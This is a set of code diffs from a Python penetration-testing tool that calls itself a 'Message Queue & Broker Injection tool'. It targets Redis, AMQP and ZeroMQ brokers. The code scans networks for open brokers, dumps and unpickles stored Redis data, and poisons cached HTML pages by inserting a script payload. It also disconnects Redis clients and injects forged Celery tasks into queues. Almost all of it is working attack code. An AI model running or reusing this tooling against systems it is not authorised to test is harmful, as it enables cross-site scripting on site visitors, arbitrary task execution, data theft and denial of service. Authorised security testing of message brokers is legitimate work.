# _BaseType.__str__ = __str__
# endregion
# --------------------------------------------------------------------------
# New type
# --------------------------------------------------------------------------
class FileType(_BaseType):
allow_casts = (int, str)
MESSAGES = {
'convert' : u"Couldn't interpret '{0}' as string.",
'max_length': u"String value is too long.",
'min_length': u"String value is too short."
}
def __init__(self, name=None, file_type=None, path=None, max_length=None, min_length=None, **kwargs):
self.max_length = max_length
self.min_length = min_length
self.file_type = file_type
self.path = path
super(FileType, self).__init__(**kwargs)
def to_native(self, value, context=None):
if value is None:
return None
if not isinstance(value, unicode):
if isinstance(value, self.allow_casts):
if not isinstance(value, str):
value = str(value)
value = utf8_decode(value) # unicode(value, 'utf-8')
else:
raise ConversionError(self.messages['convert'].format(value))
return value
def validate_length(self, value):
len_of_value = len(value) if value else 0
if self.max_length is not None and len_of_value > self.max_length:
raise ValidationError(self.messages['max_length'])
if self.min_length is not None and len_of_value < self.min_length:
raise ValidationError(self.messages['min_length'])
# --------------------------------------------------------------------------
# STB Model class
# --------------------------------------------------------------------------
class Model(_Model):
MESSAGES = {
"label": "Console label"
}
BASIC_REVERSE = {
"IntType" : "int",
"URLType" : "str",
"IPv4Type" : "str",
"DateType" : "str",
"HashType" : "str",
"SHA1Type" : "str",
"FileType" : "str",
"LongType" : "int",
"EmailType" : "str",
"FloatType" : "float",
"NumberType" : "int",
"StringType" : "str",
"DecimalType" : "float",
"BooleanType" : "bool",
"DateTimeType": "str",
}
def __init__(self, raw_data=None, deserialize_mapping=None, strict=True, **kwargs):
super(Model, self).__init__(raw_data=raw_data, deserialize_mapping=deserialize_mapping, strict=strict)
for k, v in kwargs.items():
if k in self.keys():
setattr(self, k, v)
# ----------------------------------------------------------------------
def get_basic_types(self):
"""
Get a dict with basic types
"""
results = {}
for name, _type in self._fields.items():
try:
results[name] = self.BASIC_REVERSE[_type.__class__.__name__]
except KeyError:
pass
return results
# ----------------------------------------------------------------------
def get_field_results(self):
"""
Return the name of property that will contains the file results
:return: a string with the name of field of file results
:rtype: str
"""
for name, _type in self._fields.items():
if _type.is_file_results:
return name
return None
if __name__ == '__main__':
class Testing(Model):
p1 = FileType(is_file_results=True)
m1 = Testing()
print(m1.get_field_results())

View File

@@ -55,7 +55,7 @@ def new_module_validate(self):
if func.validator() is False:
self._errors = {}
if type(self._fields[name]) != type(self._fields[name].__type__):
if type(self._fields[name].data) is type(self._fields[name].__type__):
self._errors[name] = ("Data type incorrect or not default value "
"provided. Got %s. Expected: %s" % (
type(self._fields[name].data),
@@ -115,7 +115,8 @@ def _validator(self):
if self.data is None:
return True
else:
to_check = self.default
# to_check = self.default
return False
else:
if not isinstance(to_check, self.__type__):
return False
@@ -133,7 +134,7 @@ StringField.validator = _validator
# ----------------------------------------------------------------------
class IntegerField(_IntegerField):
"""Improved Integer data that checks types"""
__type__ = int
__type__ = six.integer_types
IntegerField.validator = _validator
@@ -164,5 +165,5 @@ BoolField.validator = _validator
# ----------------------------------------------------------------------
class SelectField(_SelectField):
"""Improved bool data that checks types"""
__type__ = str
__type__ = six.text_type
SelectField.validator = _validator

View File

@@ -1,8 +0,0 @@
# -*- coding: utf-8 -*-
class Singleton(object):
def __new__(cls,*args,**kwargs):
if '_inst' not in vars(cls):
cls._inst = super(Singleton,cls).__new__(cls)
return cls._inst

View File

@@ -77,7 +77,10 @@ def find_hooks():
loop_file = loop_file[1:] if loop_file.startswith(".") else loop_file
# Load module info
classes = __import__(loop_file, globals=globals(), locals=locals(), level=loop_file.count("."))
try:
classes = __import__("%s.%s" % (__package__, loop_file), globals=globals(), locals=locals(), level=loop_file.count("."))
except ImportError:
classes = __import__(loop_file, globals=globals(), locals=locals(), level=loop_file.count("."))
# Get Modules instances
for m in dir(classes):

View File

@@ -6,7 +6,7 @@ log = logging.getLogger(__name__)
# --------------------------------------------------------------------------
class IModule:
class IModule(object):
"""Interface for modules"""
name = None
@@ -66,7 +66,10 @@ def find_modules():
loop_file = loop_file[1:] if loop_file.startswith(".") else loop_file
# Load module info
classes = __import__(loop_file, globals=globals(), locals=locals(), level=loop_file.count("."))
try:
classes = __import__("%s.%s" % (__package__, loop_file), globals=globals(), locals=locals(), level=loop_file.count("."))
except ImportError:
classes = __import__(loop_file, globals=globals(), locals=locals(), level=loop_file.count("."))
# Get Modules instances
for m in dir(classes):

View File

@@ -1,42 +0,0 @@
# -*- coding: utf-8 -*-
import six
import logging
from time import sleep
from kombu import Connection
from .utils import list_remote_process
log = logging.getLogger()
# ----------------------------------------------------------------------
def action_proc_raw_dump(config):
log.warning(" - Trying to connect with server...")
url = '%s://%s' % (config.broker_type, config.target)
# with Connection('redis://%s' % REDIS) as conn:
with Connection(url) as conn:
in_queue = conn.SimpleQueue('celery')
while 1:
for remote_process, remote_args in list_remote_process(config, in_queue):
# Show info
log.error("Found process information:")
log.error(" - Remote process name: '%s'" % remote_process)
log.error(" - Input parameters:")
for i, x in enumerate(remote_args):
log.error(" -> P%s: %s" % (i, x))
# Queue is empty -> wait
if config.streaming_mode:
log.error("No more messages from server. Waiting for %s seconds and try again.." % config.interval)
sleep(config.interval)
else:
log.error("No more messages from server. Exiting...")
return

View File

@@ -2,9 +2,9 @@
import logging
from modules import IModule
from libs.core.models import StringField, IntegerField
from libs.core.structs import CommonData
from .. import IModule
from ...libs.core.structs import CommonData
from ...libs.core.models import StringField, IntegerField
from .redis_dump import action_redis_dump
from .redis_shell import action_redis_shell
@@ -24,7 +24,6 @@ class ModuleModel(CommonData):
target = StringField(required=True)
port = IntegerField(default=6379)
db = IntegerField(default=0)
export_results = StringField()
# ----------------------------------------------------------------------

View File

@@ -11,8 +11,10 @@ def parser_redis_dump(parser):
Dump all redis database information
"""
gr = parser.add_argument_group("custom raw dump options")
gr.add_argument("--no-raw", action="store_true", dest="no_raw", default=False,
gr.add_argument("--no-screen", action="store_true", dest="no_screen", default=False,
help="do not show displays raw database info into screen")
gr.add_argument("-e", "--export-results", dest="export_results",
help="export dumped information results")
# ----------------------------------------------------------------------

View File

@@ -1,6 +1,8 @@
# -*- coding: utf-8 -*-
import six
import redis
import string
import logging
from lxml import etree
@@ -58,15 +60,41 @@ def handle_html(config, content):
# --------------------------------------------------------------------------
# Search start and end possition of HTML page
# --------------------------------------------------------------------------
pos_ini = pos_end = None
for i, x in enumerate(content):
if chr(x) == "<":
pos_ini = i
break
tmp_pos = -1
if six.PY2:
if six.u(x) == six.u("<"):
tmp_pos = i
else:
if chr(x) == "<":
tmp_pos = i
# Is printable? to avoid nulls and false '<'
if tmp_pos == i and len(content) != i:
if six.PY2:
if content[i + 1] in string.printable:
pos_ini = i
break
else:
if chr(content[i + 1]) in string.printable:
pos_ini = i
break
# else:
# pos_ini = i
# break
for i, x in enumerate(content[::-1]):
if chr(x) == ">":
pos_end = len(content) - i
break
if six.PY2:
if six.u(x) == six.u("<"):
pos_end = len(content) - i
break
else:
if chr(x) == "<":
pos_end = len(content) - i
break
if pos_ini is None or pos_end is None:
raise ValueError("Not found HTML content into cache")
@@ -74,37 +102,32 @@ def handle_html(config, content):
txt_content = content[pos_ini:pos_end]
# Parse input
tree = etree.fromstring(txt_content, etree.HTMLParser())
tree = etree.fromstring(txt_content, parser=etree.HTMLParser())
doc_root = tree.getroottree()
results = None
# --------------------------------------------------------------------------
# Search insertion points
for point in ("head", "title", "body", "script", "div", "p"):
insert_point = doc_root.find(".//%s" % point)
# --------------------------------------------------------------------------
if insert_point is None:
continue
# Try to find end of script entries
insert_point = doc_root.find(".//script[last()]")
# --------------------------------------------------------------------------
# Add the injection Payload
# --------------------------------------------------------------------------
if config.poison_payload_file is not None:
with open(config.poison_payload_file, "rU") as f:
_f_payload = f.read()
payload = etree.fromstring(_f_payload)
if insert_point is not None:
results = add_injection(config, doc_root, insert_point)
elif config.poison_payload:
payload = etree.fromstring(config.poison_payload)
else:
payload = etree.fromstring("<script>alert('You are vulnerable to broker injection')</script>")
else:
# Try to find othe entry
for point in ("head", "title", "body", "div", "p"):
insert_point = doc_root.find(".//%s" % point)
insert_point.addnext(payload)
if insert_point is None:
continue
# Set results
results = bytes(etree.tostring(doc_root))
results = add_injection(config, doc_root, insert_point)
break
break
# --------------------------------------------------------------------------
# Build results
@@ -112,6 +135,33 @@ def handle_html(config, content):
return results
# ----------------------------------------------------------------------
def add_injection(config, doc_root, insert_point):
# --------------------------------------------------------------------------
# Add the injection Payload
# --------------------------------------------------------------------------
if config.poison_payload_file is not None:
with open(config.poison_payload_file, "rU") as f:
_f_payload = f.read()
payload = etree.fromstring(_f_payload)
elif config.poison_payload:
payload = etree.fromstring(config.poison_payload)
else:
payload = etree.fromstring("<script>alert('You are vulnerable to broker injection')</script>")
insert_point.addnext(payload)
# Set results
tmp_results = etree.tostring(doc_root, method="html", pretty_print=True, encoding=doc_root.docinfo.encoding)
# Codding filters
results = tmp_results.decode(errors="replace").replace("\\u000a", "\n")
return results
# ----------------------------------------------------------------------
def action_redis_cache_poison(config):
"""
@@ -137,10 +187,10 @@ def action_redis_cache_poison(config):
log.error("Looking for caches in '%s'..." % config.target)
for x in cache_keys:
log.warning(" - Possible cache found in key: %s" % str(x))
log.error(" - Possible cache found in key: %s" % str(x))
if not cache_keys:
log.warning(" - No caches found")
log.error(" - No caches found")
# Stop
return
@@ -156,9 +206,19 @@ def action_redis_cache_poison(config):
for val in cache_keys:
content = dump_key(val, con)
try:
_val = val.decode(errors="ignore")
except AttributeError:
_val = val
try:
_content = content.decode(errors="ignore")
except AttributeError:
_content = content
# If key doesn't exist content will be None
if content is None:
log.error(" - Provided key '%s' not found in server" % val)
log.error(" - Provided key '%s' not found in server" % _val)
continue
# --------------------------------------------------------------------------
@@ -168,7 +228,7 @@ def action_redis_cache_poison(config):
if config.poison is True:
# Set injection
try:
modified = handle_html(config, content)
modified = handle_html(config, content) # DO NOT USE _content. Function expect bytes, not str.
except ValueError as e:
log.error(" - Can't modify cache content: " % e)
continue
@@ -177,18 +237,18 @@ def action_redis_cache_poison(config):
# Injection was successful?
if modified is None:
log.warning(" - Can't modify content: ensure that content is HTML")
log.error(" - Can't modify content: ensure that content is HTML")
continue
# Set injection into server
con.setex(val, 200, modified)
log.error(" - Poisoned cache key '%s' at server '%s'" % (val, config.target))
log.error(" - Poisoned cache key '%s' at server '%s'" % (_val, config.target))
else:
# If not poison enabled display cache keys
log.error(" -> Key: '%s' - " % val)
log.error(" -> Content:\n %s" % content)
log.error(" -> Key: '%s'" % _val)
log.error(" -> Content:\n %s" % _content)
if not cache_keys:
log.error(" - No cache keys found in server: Can't poison remote cache.")
log.error(" - No cache keys found in server.")

View File

@@ -22,22 +22,29 @@ def action_redis_server_disconnect(config):
# Disconnect all clients?
if config.disconnect_all:
for c in clients:
con.client_kill(c)
try:
con.client_kill(c)
log.error(" - Client '%s' was disconnected" % c)
except redis.exceptions.ResponseError:
log.error(" - Client '%s' is not connected" % c)
log.error(" - Disconnected client '%s'" % c)
# Disconnect only one user
else:
# Check client format
if config.client is None or ":" not in config.client:
log.error("Invalid client format. Client must be format: IP:PORT, i.e: 10.211.55.2:61864")
log.error(" <!> Invalid client format. Client must be format: IP:PORT, i.e: 10.211.55.2:61864")
return
try:
_c = clients[config.client]
try:
con.client_kill(_c)
con.client_kill(_c)
log.error(" - Client '%s' was disconnected" % _c)
except redis.exceptions.ResponseError:
log.error(" - Client '%s' is not connected" % _c)
log.error(" - Disconnected client '%s'" % _c)
except KeyError:
log.warning("Client '%s' doesn't appear to be connected to server" % config.client)
log.error(" <!> Client '%s' doesn't appear to be connected to server" % config.client)

View File

@@ -19,8 +19,18 @@ def action_redis_discover_dbs(config):
log.error("Discovered '%s' DBs at '%s':" % (config.target, con.config_get("databases")['databases']))
discovered_dbs = set()
for db_name, db_content in six.iteritems(con.info("keyspace")):
log.error(" - %s - %s keys" % (db_name.upper(), db_content['keys']))
discovered_dbs.add(db_name.upper())
for i in six.moves.range((int(con.config_get("databases")['databases']) - len(con.info("keyspace")))):
log.error(" - DB%s - Empty" % str(i))
_db_name = "DB%s" % i
if _db_name in discovered_dbs:
continue
log.error(" - %s - Empty" % _db_name)

View File

@@ -1,32 +1,143 @@
# -*- coding: utf-8 -*-
import six
import json
import redis
import base64
import logging
import binascii
from six.moves.cPickle import loads
log = logging.getLogger()
# ----------------------------------------------------------------------
def dump_keys(con):
for key in con.keys('*'):
key_type = con.type(key).lower()
val = None
if key_type == b"kv":
if key_type in (b"kv", b"string"):
val = con.get(key)
if key_type == b"hash":
elif key_type in (b"hash", b"unacked", b"unacked_index"):
val = con.hgetall(key)
if key_type == b"zet":
elif key_type == b"zet":
val = con.zrange(key, 0, -1)
if key_type == b"set":
elif key_type in (b"set", b"list"):
val = con.mget(key)
elif key_type == b"list":
con.lrange(key, 0, -1)
if val is not None:
if isinstance(val, list):
if val[0] is None:
continue
yield val
yield key, val
# --------------------------------------------------------------------------
# Human parsers
# --------------------------------------------------------------------------
def decode_object(key, val, ident=5):
if isinstance(val, dict):
log.error(' "%s":' % key)
log.error(" {")
_decode_object(val, ident)
log.error(" }")
else:
log.error(' "%s": "%s"' % (key, val))
# ----------------------------------------------------------------------
def _decode_object(val, ident=5):
"""
Decode recursively string
"""
_new_ident = ident + 1
for k, v in six.iteritems(val):
# convert value to original type -> JSON
try:
_transformed_info = json.loads(v.decode("utf-8"))
except (binascii.Error, AttributeError, ValueError):
_transformed_info = v
# --------------------------------------------------------------------------
# Try to display in "human" format
# --------------------------------------------------------------------------
if isinstance(_transformed_info, list):
log.error('%s"%s":' % (" " * ident, k))
for x in _transformed_info:
if isinstance(x, dict):
# Open data
log.error("%s{" % (" " * _new_ident))
_decode_object(x, _new_ident + 2)
log.error("%s}" % (" " * _new_ident))
else:
log.error('%s"%s"' % ((" " * ident), x))
# Dict handler
elif isinstance(_transformed_info, dict):
log.error('%s"%s":' % ((" " * ident), k))
log.error("%s{" % (" " * _new_ident))
_decode_object(v, _new_ident + 2)
log.error("%s}" % (" " * _new_ident))
# Basic type as value
else:
try:
use_obj = _transformed_info.encode()
except (TypeError, AttributeError, binascii.Error):
use_obj = _transformed_info
# Is Pickle encoded?
try:
_pickle_decoded = loads(use_obj)
# Is pickled
log.error('%s"%s":' % ((" " * ident), k))
log.error("%s{" % (" " * _new_ident))
_decode_object(_pickle_decoded, _new_ident + 2)
log.error("%s}" % (" " * _new_ident))
except Exception as e:
if "BadPickleGet" == e.__class__.__name__:
log.info(
" <!!> Can't decode value for key '%s' because Pickle protocol 3 o 4 used, and it's "
"incompatible with Python 2" % k)
# Try again decoding in base64
try:
_b64_decoded = base64.decodebytes(use_obj)
# Is pickled
log.error('%s"%s":' % ((" " * ident), k))
log.error("%s{" % (" " * _new_ident))
_decode_object(loads(_b64_decoded), _new_ident + 2)
log.error("%s}" % (" " * _new_ident))
except Exception:
# Transform is not possible -> plain string
log.error('%s"%s": "%s"' % ((" " * ident), k, use_obj))
# ----------------------------------------------------------------------
@@ -41,17 +152,37 @@ def action_redis_dump(config):
# Export results?
export_file = None
if config.export_results:
export_file = open(config.export_results, "w")
export_file_name = None
# Fix filename
if config.export_results:
export_file_name = config.export_results if ".json" in config.export_results else "%s.json" % config.export_results
if config.export_results:
export_file = open(export_file_name, "w")
log.error(" - Storing information into '%s'" % export_file_name)
elif config.no_screen is True:
log.error(" <!> If results will not be displayed, you must to indicate output file for results.")
return
registers = False
for i, t_val in enumerate(dump_keys(con)):
key = t_val[0]
val = t_val[1]
for val in dump_keys(con):
# Display results?
if config.no_raw is False:
log.warning(val)
if config.no_screen is False:
decode_object(key, val)
# Dump to file?
if export_file is not None:
export_file.write(str(val))
export_file.write("%s: %s" % (key, str(val)))
# There are registers
registers = True
if registers is False:
log.error(" - No information to dump in database")
# Close file descriptor
if export_file is not None:

View File

@@ -2,10 +2,10 @@
import logging
from modules import IModule
from .. import IModule
from libs.core.structs import CommonData
from libs.core.models import StringField, BoolField, IntegerField
from ...libs.core.structs import CommonData
from ...libs.core.models import StringField, BoolField, IntegerField, FloatField
from .scan_main import action_scan_main
@@ -17,7 +17,9 @@ class ModuleModel(CommonData):
ports = StringField(default="5672,6379,5555", label="comma separated ports")
target = StringField(required=True)
own_ips = BoolField(label="Try to find all IPs registered for this company")
concurrency = IntegerField(label="maximum parallels scans", default=10)
concurrency = IntegerField(label="maximum parallels scans", default=20)
output = StringField(label="output file, in JSON format")
timeout = FloatField(label="timeout for socket connections", default=0.2)
# ----------------------------------------------------------------------

View File

@@ -2,6 +2,7 @@
import six
import zmq
import json
import redis
import socket
import logging
@@ -11,6 +12,7 @@ import amqp.connection
from functools import partial
from collections import defaultdict
from threading import Thread, BoundedSemaphore
from .patch import patch_transport
@@ -27,6 +29,8 @@ logging.getLogger('amqp').setLevel(100)
log = logging.getLogger()
OPEN_SERVICES = defaultdict(dict)
# ----------------------------------------------------------------------
def _do_scan(config, sem, host):
@@ -45,24 +49,35 @@ def _do_scan(config, sem, host):
for port in config.ports.split(","):
# Check each serve
for server, handle in six.iteritems(handlers):
for server_type, handle in six.iteritems(handlers):
log.info(" >> Trying to find %s service in '%s' port '%s'." % (server_type, host, port))
try:
log.debug(" >> Trying '%s' port '%s'" % (host, port))
# Try to check if port is open
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.settimeout(config.timeout)
result = s.connect_ex((host, int(port)))
except socket.gaierror as e:
log.warning("%s : %s error: %s" % (server, port, e))
log.debug("%s : %s error: %s" % (server_type, port, e))
continue
finally:
s.close()
# Is port open?
if result == 0:
log.info(" <i> Port '%s' is open in '%s'" % (port, host))
if handle(host, port, config) is True:
log.error(" <!!> Open '%s' server found in port '%s'" % (server, port))
log.error(" <!!> Open '%s' server found in port '%s' at '%s'" % (server_type, port, host))
OPEN_SERVICES[host][server_type] = dict(
state="open",
port=port
)
else:
log.debug(" <i> Port %s is closed" % port)
@@ -106,6 +121,30 @@ def action_scan_main(config):
for t in threads:
t.join()
# --------------------------------------------------------------------------
# Display results
# --------------------------------------------------------------------------
if OPEN_SERVICES:
log.error(" - Open services found:")
for host, content in six.iteritems(OPEN_SERVICES):
log.error(" -> Host - %s" % host)
for server_type, server_info in six.iteritems(content):
log.error(" * %s/TCP [%s]" % (server_info['port'], server_type))
else:
log.error(" - No open services found")
# --------------------------------------------------------------------------
# Export results
# --------------------------------------------------------------------------
if config.output is not None:
_output_path = "%s.json" % config.output if ".json" not in config.output else config.output
with open(_output_path, "w") as f:
json.dump(OPEN_SERVICES, f)
log.error(" - Output results saved into: %s" % _output_path)
# --------------------------------------------------------------------------
def build_targets(config):
@@ -113,7 +152,7 @@ def build_targets(config):
results = set()
# Split targets
for t in config.target.split("-"):
for t in config.target.split(","):
try:
results.update(str(x) for x in ipaddress.ip_network(t, strict=False))
except ValueError:
@@ -133,7 +172,7 @@ def build_targets(config):
for v in val:
log.debug(" -> Detected registered network '%s'. Added for scan." % v)
results.update(str(x) for x in ipaddress.ip_network(v, strict=False))
results.update(str(x) for x in ipaddress.ip_network(six.u(v), strict=False))
except KeyError:
# Invalid domain
log.debug(" <ii> Error while try to extract domain: '%s'" % t)
@@ -162,7 +201,7 @@ def build_targets(config):
# Add CDIR to result
scan_target = "%s%s" % (host_ip, "/%s" % _target_cdir[1] if len(_target_cdir) > 1 else "")
results.update(str(x) for x in ipaddress.ip_network(scan_target, strict=False))
results.update(str(x) for x in ipaddress.ip_network(six.u(scan_target), strict=False))
return results

View File

@@ -1,17 +1,18 @@
# -*- coding: utf-8 -*-
import logging
from modules import IModule
from .. import IModule
from libs.core.structs import CommonData
from libs.core.models import IntegerField, StringField, SelectField
from ...libs.core.structs import CommonData
from ...libs.core.models import StringField, SelectField
from .cmd_actions import parser_proc_raw_dump, parser_proc_list_process, parser_proc_inject_process
from .proc_remove import action_proc_remove
from .proc_raw_dump import action_proc_raw_dump
from .proc_list_process import action_proc_list_process
from .proc_inject_process import action_proc_inject_process
from .cmd_actions import parser_proc_raw_dump, parser_proc_list_tasks, parser_taks_inject_process
from .tasks_remove import action_proc_remove
from .tasks_raw_dump import action_proc_raw_dump
from .tasks_list_process import action_proc_list_tasks
from .tasks_inject_process import action_task_inject_process
log = logging.getLogger()
@@ -19,9 +20,9 @@ log = logging.getLogger()
# ----------------------------------------------------------------------
class ModuleModel(CommonData):
target = StringField(required=True)
export_results = StringField(default="")
import_results = StringField(default=None)
db = StringField(default=None, label="only for Redis: database to use")
process_manager = SelectField(default="celery", choices=[("celery", "Celery")],
label="process manager running in backend")
broker_type = SelectField(default="redis", choices=[
("redis", "Redis server"),
("zmq", "ZeroMQ"),
@@ -41,15 +42,15 @@ class RemoteProcessModule(IModule):
cmd_args=parser_proc_raw_dump,
action=action_proc_raw_dump
),
'list-process': dict(
help="list remote process and their params",
cmd_args=parser_proc_list_process,
action=action_proc_list_process
'list-tasks': dict(
help="list remote tasks and their params",
cmd_args=parser_proc_list_tasks,
action=action_proc_list_tasks
),
'inject': dict(
help="list remote process and their params",
cmd_args=parser_proc_inject_process,
action=action_proc_inject_process
help="inject a new task into broker",
cmd_args=parser_taks_inject_process,
action=action_task_inject_process
),
'remove': dict(
help="remove remote processes in server",
@@ -58,7 +59,7 @@ class RemoteProcessModule(IModule):
),
}
name = "proc"
name = "tasks"
description = "try to discover and handle processes in remote MQ/Brokers"
# ----------------------------------------------------------------------

View File

@@ -13,10 +13,11 @@ def parser_proc_raw_dump(parser):
help="although all information be dumped do not stop")
gr.add_argument("-I", dest="interval", type=float, default=4,
help="timeout interval between tow connections")
gr.add_argument("--output", dest="output", help="store dumped information into file")
# ----------------------------------------------------------------------
def parser_proc_list_process(parser):
def parser_proc_list_tasks(parser):
parser.add_argument("-N", "--no-stream", dest="no_stream", action="store_true", default=False,
help="force to not listen until message is received")
@@ -29,7 +30,7 @@ def parser_proc_list_process(parser):
# ----------------------------------------------------------------------
def parser_proc_inject_process(parser):
def parser_taks_inject_process(parser):
gr = parser.add_argument_group("process importing options")
gr.add_argument("-f", "--function-file", dest="function_files", type=str, required=True,

View File

@@ -14,10 +14,10 @@ log = logging.getLogger()
# ----------------------------------------------------------------------
def action_proc_inject_process(config):
def action_task_inject_process(config):
if config.function_files is None:
log.warning(" - input .json file with process files is needed")
log.error(" - input .json file with process files is needed")
return
# --------------------------------------------------------------------------
@@ -26,7 +26,7 @@ def action_proc_inject_process(config):
with open(config.function_files, "r") as f:
f_info = json.load(f)
log.warning(" - Building process...")
log.error(" - Building process...")
# Search and inject process
injections = []
@@ -38,7 +38,7 @@ def action_proc_inject_process(config):
# Fill process information
# --------------------------------------------------------------------------
inject_process = {
"args": [x for x, y in six.iteritems(parameters)],
"args": [y for x, y in six.iteritems(parameters)],
"callbacks": None,
"chord": None,
"errbacks": None,
@@ -47,7 +47,7 @@ def action_proc_inject_process(config):
"id": uuid.uuid1(),
"kwargs": {},
"retries": 0,
"task": "tasks.%s" % p["function"],
"task": p["function"],
"taskset": None,
"timelimit": [
None,
@@ -68,7 +68,7 @@ def action_proc_inject_process(config):
with Connection(url) as conn:
in_queue = conn.SimpleQueue('celery')
log.warning(" - Sending processes to '%s'" % config.target)
log.error(" - Sending processes to '%s'" % config.target)
for i, e in enumerate(injections, 1):
log.warning(" %s) %s" % (i, e['task']))

View File

@@ -14,7 +14,7 @@ log = logging.getLogger()
# ----------------------------------------------------------------------
def action_proc_list_process(config):
def action_proc_list_tasks(config):
log.warning(" - Trying to connect with server...")
@@ -29,7 +29,7 @@ def action_proc_list_process(config):
# Get remote process
first_msg = True
while 1:
for remote_process, remote_args in list_remote_process(config, in_queue):
for remote_process, remote_args, _ in list_remote_process(config, in_queue):
if remote_process not in process_info:
process_info[remote_process] = remote_args
@@ -65,7 +65,10 @@ def action_proc_list_process(config):
# Save template
# --------------------------------------------------------------------------
# Build path in current dir
export_path = "%s.json" % os.path.abspath(config.template)
export_path = os.path.abspath(config.template)
if ".json" not in export_path:
export_path += ".json"
# dumps
json.dump(export_data, open(export_path, "w"))

View File

@@ -0,0 +1,83 @@
# -*- coding: utf-8 -*-
import six
import csv
import logging
from time import sleep
from kombu import Connection
from .utils import list_remote_process
log = logging.getLogger()
# ----------------------------------------------------------------------
def action_proc_raw_dump(config):
log.warning(" - Trying to connect with server...")
url = '%s://%s' % (config.broker_type, config.target)
f_output = None
csv_output = None
if config.output is not None:
fixed_f = "%s.csv" % config.output if ".csv" not in config.output else config.output
f_output = open(fixed_f, "a")
csv_output = csv.writer(f_output)
log.error(" - Storing results at '%s'" % fixed_f)
# Write first col
csv_output.writerow([
"# Task name",
"Parameters (position#value)"
])
already_processed = set()
# with Connection('redis://%s' % REDIS) as conn:
with Connection(url) as conn:
in_queue = conn.SimpleQueue('celery')
while 1:
for remote_task, remote_args, task_id in list_remote_process(config, in_queue):
# Task already processed?
if task_id not in already_processed:
# Track
already_processed.add(task_id)
# Show info
log.error(" Found process information:")
log.error(" - Remote tasks name: '%s'" % remote_task)
log.error(" - Input parameters:")
to_csv = [remote_task]
for i, x in enumerate(remote_args):
log.error(" -> P%s: %s" % (i, x))
# Prepare to store JSON
to_csv.append("%s#%s" % (i, x))
# Store
if csv_output is not None:
csv_output.writerow(to_csv)
# Queue is empty -> wait
if config.streaming_mode:
log.error(" -> No more messages from server. Waiting for %s seconds and try again.." % config.interval)
sleep(config.interval)
else:
log.error(" -> No more messages from server. Exiting...")
return
# Close file descriptor
if f_output is not None:
f_output.close()
csv_output.close()

View File

@@ -23,4 +23,4 @@ def action_proc_remove(config):
for _ in get_remote_messages(config, in_queue, False):
pass
log.error(" - All processes removed from '%s'" % config.target)
log.error(" - All tasks removed from '%s'" % config.target)

View File

@@ -32,13 +32,13 @@ def get_param_type(value):
return "list"
elif type(value) == bytes:
try:
value.decode()
six.u(value)
return "bytes"
except Exception:
return "str"
elif type(value) == str:
elif type(value) in (str, unicode if six.PY2 else ""):
return "str"
else:
return "object"
@@ -138,10 +138,10 @@ def list_remote_process(config, queue):
# Read info
if msg_id not in already_processed:
remote_process = deserialized['task'].split(".")[-1]
remote_process = deserialized['task']
remote_args = deserialized['args']
# Store as processed
already_processed.add(msg_id)
yield remote_process, remote_args
yield remote_process, remote_args, msg_id

View File

@@ -1,5 +1,5 @@
six
flask
lxml
wtforms
eventlet
colorlog

View File

@@ -23,6 +23,8 @@
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import sys
from os.path import dirname, join
from setuptools import setup, find_packages
@@ -30,10 +32,14 @@ from setuptools import setup, find_packages
with open(join(dirname(__file__), 'requirements.txt')) as f:
required = f.read().splitlines()
if sys.version_info[0] == 2:
bin_name = "enteletaor"
else:
bin_name = "enteletaor3"
setup(
name='enteletaor',
version='1.0.0',
version="1.0.0",
install_requires=required,
url='https://github.com/cr0hn/enteletaor',
license='BSD',
@@ -42,8 +48,8 @@ setup(
packages=find_packages(),
include_package_data=True,
entry_points={'console_scripts': [
'enteletaor = enteletaor_lib.enteletaor:main',
]},
'%s = enteletaor_lib.enteletaor:main' % bin_name
]},
description='Message Queue & Broker Injection tool',
long_description=open('README.rst', "r").read(),
classifiers=[